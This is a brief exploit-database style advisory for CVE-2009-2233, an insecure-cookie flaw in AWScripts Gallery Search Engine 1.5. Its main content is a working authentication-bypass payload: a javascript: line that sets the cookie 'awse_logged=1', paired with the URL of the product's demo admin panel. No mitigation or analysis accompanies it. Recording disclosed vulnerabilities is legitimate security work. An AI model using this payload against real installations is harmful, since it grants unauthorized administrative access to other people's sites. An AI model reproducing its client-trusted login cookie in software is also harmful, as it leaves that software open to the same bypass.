
Topic: |
AWScripts Gallery Search Engine 1.x Insecure Cookie Vulnerability |
Credit: |
TiGeR-Dz |
Date: |
2009.07.01 |
CWE: |
CWE-284 (Show similar)
|
CVE: |
CVE-2009-2233 (Show details)
Use CVE to see details like: - CVSS2, - Affected Software, - References |

| Risk |
Local |
| Remote |
| Medium |
No |
| Yes |
[+] AWScripts.com Gallery Search Engine 1.5 Remote Cookie Insecure
[+] Discovered By TiGeR-Dz
Cookie Insecure
javascript:document.cookie="awse_logged=1;path=/";
Demo
----
http://www.awscripts.com/demo_se/awse/awse_admin/index.php
[ ASCII VERSION ]
|